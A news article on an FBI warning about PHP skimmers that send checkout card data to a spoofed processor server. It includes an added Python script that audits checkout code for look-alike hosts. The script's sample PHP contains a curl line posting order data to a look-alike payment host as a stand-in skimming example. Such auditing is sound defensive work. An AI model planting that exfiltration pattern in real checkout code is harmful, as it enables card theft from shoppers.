
Use of malicious PHP code by hackers leads to stolen credit card data


The FBI states that unidentified hackers created a backdoor into a victim’s system and accessed their credit card data.

The FBI has issued a warning that unidentified individuals have been scraping credit card data from the checkout pages of US websites, and e-commerce business owners are starting to worry.

“As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server,” the FBI said.  

Similar attacks began back in September 2020, and at that time the PHP functions were tracked and deterred before substantial damage occurred. Earlier this year, it was reported that the attackers had changed tactics by implementing a different version of the PHP code.
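The FBI statement above describes exfiltration to a server that spoofed a legitimate card processing server. As an added example (not code from the FBI advisory or from this article), the following Python audit scans checkout PHP source for literal URLs whose host is not on an allowlist and marks near-matches of an allowed host as look-alikes; the host names, the sample file and the 0.85 similarity threshold are constructed assumptions.

```python
import re
from difflib import SequenceMatcher

# Assumption: the only hosts this shop's checkout code should contact (constructed names).
ALLOWED_HOSTS = ("api.payments.example", "checkout.shop.example")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Constructed sample of a checkout script; line 4 talks to a host that differs
# from the real processor by one character, line 6 loads from an unlisted host.
SAMPLE_CHECKOUT_PHP = """<?php
$ch = curl_init('https://api.payments.example/v1/charge');
curl_setopt($ch, CURLOPT_POSTFIELDS, $order);
$x = curl_init('https://api-payments.example/v1/charge');
curl_setopt($x, CURLOPT_POSTFIELDS, $order);
echo '<script src="https://cdn.static.example/lib.js"></script>';
"""

def closest_allowed(host):
    """Return (allowed_host, similarity in 0..1) for the nearest allowlisted name."""
    scored = [(SequenceMatcher(None, host, a).ratio(), a) for a in ALLOWED_HOSTS]
    score, name = max(scored)
    return name, score

def audit(php_source, lookalike_threshold=0.85):
    """List (line_no, host, kind, imitated_host) for every non-allowlisted URL host."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for host in HOST_RE.findall(line):
            host = host.lower().rstrip(".")
            if host in ALLOWED_HOSTS:
                continue
            near, score = closest_allowed(host)
            if score >= lookalike_threshold:
                # Close to a trusted name but not equal: likely a spoofed processor.
                findings.append((line_no, host, "lookalike", near))
            else:
                findings.append((line_no, host, "unknown", None))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CHECKOUT_PHP):
        print(finding)
```

Run against a known-good copy of the checkout code first so the allowlist reflects what the site legitimately contacts; any later finding is then a change worth reviewing.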

PHP a common attack vector

According to law enforcement sources, the hackers first establish a backdoor into the victim’s system by using a debugging function that allows the system to download two web shells onto the US firm’s server. Once the backdoor is established, they can exploit the data as much as they like.

Security firm Sucuri stated that PHP credit card skimmers accounted for about 41% of the new credit card skimming samples from 2021.

Web shell backdoors give attackers full access to the user’s file system. They provide powerful functionality that lets attackers change file permissions and move files into adjacent directories. According to data gathered by Sucuri, web shells account for 19% of 400 new malware signatures.

The firm saw many e-commerce sites running on Magento, WordPress, and OpenCart affected by these attackers in 2021. Only the future will tell how organizations will deter these attacks.